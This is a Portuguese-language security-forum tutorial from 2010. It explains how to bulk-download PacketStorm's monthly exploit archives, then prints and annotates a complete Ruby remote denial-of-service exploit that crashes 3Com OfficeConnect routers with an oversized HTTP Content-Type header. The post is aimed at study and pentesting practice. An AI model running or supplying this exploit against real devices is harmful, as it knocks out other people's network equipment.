Results 1 to 1 of 1

Thread: Download Mensal/Anual dos exploits do PacketStorm http://www.packetstormsecurity.org

  1. #1
    Moderator firebits's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    353

    Lightbulb Download Mensal/Anual dos exploits do PacketStorm http://www.packetstormsecurity.org

    ps.jpg

    Este site é um dos mais conhecidos pela comunidade de segurança. Inclusive é um dos objetivos que o site Segurança Linux, tem a alcançar. A tradução dos papers, exploits, vídeos e outros materiais. Em meados de 2009, o projeto Backtrack Brasil http://www.backtrack.com.br já estava traduzindo parte do conteúdo deste site, mas resolvemos ajudar e colaborar com esta ótima idéia que o SL.

    Passo 1
    Entre no site .:[ packet storm ]:. - http://packetstormsecurity.org/ com seu browser preferido.

    Passo 2
    Geralmente quando vamos procurar algum exploit ou outras informações, como quais são os exploits encontrados mais atualizados, clicamos aqui, neste menu "Exploits: By Month", em português, seria "Exploits: Por Mês" durante o ano atual. No caso deste artigo que escrevi, atualmente estamos 2010.


    E mais, passe o mouse em cima do link do mês de Março 2010 (March 2010)



    Veja que na parte inferior, do navegador exibe o Path (Caminho), provavelmente estão armazenados os exploits compactados em um único pacote TGZ.

    Passo 3
    Mas caso você precise de todos os exploits, sem ter que ler um por um e facilitar o processo de tradução e teste dos exploits, é bem simples:

    Passo 4
    Você clica na pasta que corresponde o Ano e Mês, dos exploits e depois no fim da URL, você adiciona "AnoMes.tgz", sem as aspas, veja na figura abaixo:

    Se um tela de download aparecer, faça o download e você terá todos os códigos-fonte dos exploits que desejou.

    Vamos ver um exemplo de exploit que fizemos download do mês de dezembro de 2009, que em inglês seria a Data curta em formato AAMM (ano e Mês)

    O exploit 3com_ctdos.rb.txt é feito em Ruby, devido a presença do extensão *.rb antes do *.txt (provavelmente adicionaram a extensão *.txt para evitar problemas iniciais em alguns antivirus) e também o código-fonte (source code) constar comandos de Ruby e o proprío autor, citou ser no código-fonte (source-code) ser Ruby, veja em "Exploit languaje -> Ruby"

    Explicando a idéia do exploit 3com_ctdos.rb.txt

    Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
    Seria o modelo do equipamento que o autor testou

    Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)
    Versão do firmware que foi testado e qual foi a data do mesmo

    Attacker -> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7
    Quais os SO que foram testados

    Exploit languaje -> Ruby
    Linguagem de programação usada para a exploração (exploit)

    Type -> Remote Denial of Service Exploit by HTTP
    Tipo de Ataque, no caso DoS - Denial of Service (Negação de Serviço) via HTTP

    Additional info:
    The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
    Informações Adicionais sobre este exploit

    Discovered and written by Alberto Ortega
    PenTBox
    Quem foi o autor do exploit e como entrar em contato com ele.

    Código-fonte(Source Code) do exploit "3com_ctdos.rb.txt"

    ###############
    # Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
    # Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)
    # Attacker -> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7
    #
    # Exploit languaje -> Ruby
    # Type -> Remote Denial of Service Exploit by HTTP
    #
    # Additional info:
    # - The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
    #
    ###############
    # Discovered and written by Alberto Ortega
    # PenTBox
    ###############

    require "socket"

    host = ARGV[0]
    buffer = "A"
    send = ""

    puts ""
    if !host
    puts " 3Com OfficeConnect ADSL Wireless 11g Firewall Router"
    puts " Remote DoS Exploit by HTTP"
    puts " ------ Usage ---------------------------------------"
    puts " ruby 3com_dosexploit.rb host"
    puts " Ex: ruby 3com_dosexploit.rb 192.168.1.1"
    else
    begin
    socket = TCPSocket.new(host, 80)
    puts "- Exploiting ..."
    # 8.times is enough to DoS
    9.times do
    buffer = "#{buffer}#{buffer}"
    end
    # Here are the HTTP packet, Content-Type value causes the DoS
    send = "GET / HTTP/1.1\r\nContent-Type:#{buffer}\r\n"
    socket.write(send)
    puts "- Successfully! :)"
    rescue
    puts "Connection problem"
    end
    end
    puts ""

    OBS: Em alguns SO com antivirus, será detectado como vírus mesmo sendo arquivo de texto puro, *.txt, porque fazem scanning nos arquivos internamente. Bom, ai você ja tem sua coleção exploits, que são como "escorpiões" e "aranhas" para estudarmos, tome cuidado em aos usá-los e NÂO-TESTAR EM SEU PRÓPRIO COMPUTADOR, POIS VOCÊ PODER TER PROBLEMAS. Monte uma maquina virtual em VirtualBox, VMware ou QEMU, e faça testes antes.

    Não esqueça de passar no site do Backtrack Brasil também, em http://www.backtrack.com.br

    Good Pentesting!

    Artigo Próprio por firebits
    http://www.backtrack-linux.org/forum.../firebits.html
    Immagini allegate Immagini allegate
    Last edited by firebits; 04-17-2010 at 04:50 PM.

Similar Threads

  1. [Video] How to: Crack HTTP passwords (hydra)
    By g0tmi1k in forum BackTrack Videos
    Replies: 28
    Last Post: 04-12-2011, 02:52 AM
  2. Repositório de exploits da Offensive Security
    By firebits in forum Tutoriais e Howtos
    Replies: 1
    Last Post: 03-30-2010, 06:59 PM
  3. i need some explantations about exploits
    By hans8 in forum Beginners Forum
    Replies: 5
    Last Post: 03-22-2010, 11:21 PM
  4. How do I learn how exploits work?
    By kervizic in forum Beginners Forum
    Replies: 5
    Last Post: 03-11-2010, 03:51 PM
  5. http-post-forms =how u do it????
    By blue_bsm in forum Beginners Forum
    Replies: 3
    Last Post: 01-16-2010, 05:25 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •